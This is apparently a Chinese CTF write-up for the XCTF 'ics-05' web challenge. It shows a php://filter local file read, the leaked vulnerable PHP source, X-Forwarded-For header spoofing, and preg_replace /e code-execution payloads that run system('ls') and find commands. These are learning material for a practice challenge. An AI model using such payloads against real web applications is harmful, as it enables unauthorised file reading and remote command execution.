首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >攻防世界web进阶区ics-05

攻防世界web进阶区ics-05

作者头像
wuming
发布于 2021-01-18 13:07:00
发布于 2021-01-18 13:07:00
61600
代码可运行
举报
文章被收录于专栏:wuming_CTFwuming_CTF
运行总次数:0
代码可运行
  1. 1. 题目
    1. 1.1. 解法
      1. 1.1.1. preg_replace
      2. 1.1.2. ctype_alnum
      3. 1.1.3. strpos
      4. 1.1.4. X-Forwarded-For

题目

我们只能点击一个地方

解法

御剑扫描有一个css的文件

没有什么作用

发现又点了一次的时候,url发生了改变

因为是php的页面,我们试试php伪协议读取文件

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://220.249.52.133:39554/index.php?page=php://filter/read=convert.base64-encode/resource=index.php
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设备列表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- 这里的 checked 的状态只是演示 -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设备名', templet: '#nameTpl' },
                     { field: 'area', title: '区域' },
                     { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                     { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

</body>

</html>

这是我们解密出来的文件内容

发现了一个输入的函数 他如果是字母和数字组合的话,输出page内容,同时die掉 如果不是字母和数字的组合的话,

走如下的else page中不能存在input,ta:text,text,而且不能是在page的开头处存在,否则就die掉 如果page中包含index。php,那就输出ok,然后包含page这个文件

最后还有一个内部人员的测试版本,如果要从内部访问的话, 其实本地的命令执行就可以进行使用这个函数 首先伪造xff

pattern,replacement,subject,同时有值的话 preg_replace,搜索subject中 pattern的字符串,同时替换为replacement

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。

也就是说pattern参数的结尾包含了/e修正符的话,如果replacement构成合法的代码的话便会执行

我们使用插件,成功的模拟了本地访问 我们来一波Rce 要注意字符串两个相匹配

?pat=/heihei/e&rep=system('ls /var/www/html')&sub=heihei

我们使用一下find命令 ?pat=/heihei/e&rep=system('find -name *flag*')&sub=heihei

preg_replace

ctype_alnum

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
//判断是否是字母和数字或字母数字的字符串组合
if(!ctype_alnum($str)){
    echo '只能是字母或数字的组合';exit;
}

strpos

查询某个字符串在某个字符串中第一次出现的位置

X-Forwarded-For

IP伪造

TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF头进行IP伪造

XFF字段

X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。通俗来说,就是浏览器访问网站的IP。一般格式:

X-Forwarded-For: client1, proxy1, proxy2, proxy3 左边第一个是浏览器IP,依次往右为第一个代理服务器IP,第二个,第三个(使用逗号+空格进行分割)

伪造方式

可以通过专门的抓包改包工具或者浏览器插件或者使用脚本语言构造headers参数 使用X-Fordward-For 火狐插件即可

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-08-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【愚公系列】2023年05月 攻防世界-Web(ics-05)
preg_replace 函数是一个正则表达式替换函数,它可以在字符串中执行搜索和替换操作。它的语法如下:
愚公搬代码
2025/05/28
880
【愚公系列】2023年05月 攻防世界-Web(ics-05)
preg_replace函数/e漏洞
pattern为要搜索的模式,可以是字符串或一个字符串数组;replacement是用于替换的字符串或字符串数组;subject是要搜索替换的目标字符串或字符串数组。
Andromeda
2023/10/21
4090
preg_replace函数/e漏洞
XCTF-赛博地球杯工业互联网安全大赛web部分题解
0x01工控云管理系统项目管理页面解析漏洞 题目首先给出了源码: `http://47.104.156.32:20007/view-source.php` 关键代码如下: 第一层绕过 php <?p
安恒网络空间安全讲武堂
2018/02/06
2.4K0
XCTF-赛博地球杯工业互联网安全大赛web部分题解
攻防世界web进阶区Web_php_wrong_nginx_config详解
那么我们使用御剑进行扫描,扫描到了admin和robots.txt 我们访问admin试试
wuming
2021/01/21
9810
攻防世界web进阶区Web_php_wrong_nginx_config详解
Bugku Web 部分WP
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://12
wywwzjj
2023/05/09
6470
代码注入(web安全入门)
php 代码执行(注入)是指应用程序过滤不严,用户可以 http 通过请求将代码注入到应用中执行。
黑战士
2022/12/30
1.3K0
攻防世界web进阶区ics-07详解
page不能为空,同时,他的值不能等于index.php这样,就会包含flag.php文件 否则重定向到flag.php这个文件
wuming
2021/01/21
1.5K0
攻防世界web进阶区ics-07详解
PHP.步步为营 | 正则表达式详析 与 诸多运用实例
其中字符串 '/apple/' 就是一个正则表达式, 他用来匹配源字符串中是否存在apple字符串。
凌川江雪
2019/03/19
1.9K0
PHP.步步为营 |  正则表达式详析 与 诸多运用实例
【愚公系列】2023年06月 攻防世界-Web(ics-07)
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。
愚公搬代码
2025/05/28
880
【愚公系列】2023年06月 攻防世界-Web(ics-07)
PHP10段常用功能代码
1、使用PHP Mail函数发送Email $to = "viralpatel.net@gmail.com"; $subject = "VIRALPATEL.net"; $body = "Body of your message here you can use HTML too. e.g. ﹤br﹥ ﹤b﹥ Bold ﹤/b﹥"; $headers = "From: Peter\r\n"; $headers .= "Reply-To: info@yoursite.com\r
用户7657330
2020/08/14
7380
看代码学安全(8 )preg_replace函数之命令执行
-----------------------------------------------------------------------------------
用户1631416
2018/12/13
2.3K0
PHP46 个非常有用的代码片段
在编写代码的时候有个神奇的工具总是好的!下面这里收集了 40+ PHP 代码片段,可以帮助你开发 PHP 项目。
用户7657330
2020/08/14
1.6K0
一文了解PHP的各类漏洞和绕过姿势
在用PHP进行浮点数的运算中,经常会出现一些和预期结果不一样的值,这是由于浮点数的精度有限 尽管取决于系统,PHP 通常使用 IEEE 754 双精度格式,则由于取整而导致的最大相对误差为 1.11e-16 非基本数学运算可能会给出更大误差,并且要考虑到进行复合运算时的误差传递
中龙技术
2022/09/28
5.4K0
一文了解PHP的各类漏洞和绕过姿势
CTF随笔(一)
WEB01 XSS水题 直接提交poc吧 http://xxx.com/xss1.php?bug="></h2><h1+onclick="alert()">ssss<h1><h2++value="&
Pulsar-V
2018/04/18
1.7K0
CTF随笔(一)
Z-BlogPHP 主题制作技巧,随机获得文章中的图片
调用其它数据参考文章标签,文章标签。 注意:此处需要使用foreach循环中as后面变量名,如案列中使用的 $related ,如需调用标题则用 {$related.Title} ,而并非是 {$article.Title}。
德顺
2019/11/12
5620
php写入配置文件的经典漏洞
要求是要getshell,这个场景十分经典,常用在修改配置文件写入的时候。 此处不存在之前说的那个配置文件中用的是”双引号”引起任意代码执行的问题,这这里面用的是单引号,而且 addslashes()处理过了,看似很安全,但是对于脑子里有个黑洞的搞安全的人来讲,这个还真是有问题的.
用户1879329
2023/02/27
2.7K0
[红日安全]代码审计Day8 - preg_replace函数之命令执行
文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!(来源:红日安全)
红日安全
2020/04/08
1K0
【愚公系列】2021年12月 攻防世界-进阶题-WEB-005(ics-06)
文章目录 一、ics-06 二、使用步骤 1.点击获取在线场景 2.进入页面 3.burpsuit 总结 ---- 一、ics-06 题目链接:https://adworld.xctf.org.cn/
愚公搬代码
2021/12/27
5350
【愚公系列】2021年12月 攻防世界-进阶题-WEB-005(ics-06)
php中str_replace替换实例讲解
在对于字符串的替换上,我们已经学过了不少的方法。但在做练习题的时候,我们会对多个字符串进行替换。从方法的实用性来说,str_replace就非常适合处理多个字符串的替换问题。下面我们就php中str_replace的概念、语法、参数、返回值进行讲解,然后带来替换的实例分享。
用户8824291
2021/07/13
2K0
【愚公系列】2023年06月 攻防世界-Web(Web_php_wrong_nginx_config)
PHP代码混淆后门脚本是指在进行PHP代码混淆的过程中,植入恶意代码以实现后门的攻击手段。一旦植入成功,黑客可以通过特定的操作指令,绕过用户身份验证,进入系统内部,获取敏感信息,甚至控制整个系统。
愚公搬代码
2025/05/28
950
【愚公系列】2023年06月 攻防世界-Web(Web_php_wrong_nginx_config)
推荐阅读
相关推荐
【愚公系列】2023年05月 攻防世界-Web(ics-05)
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档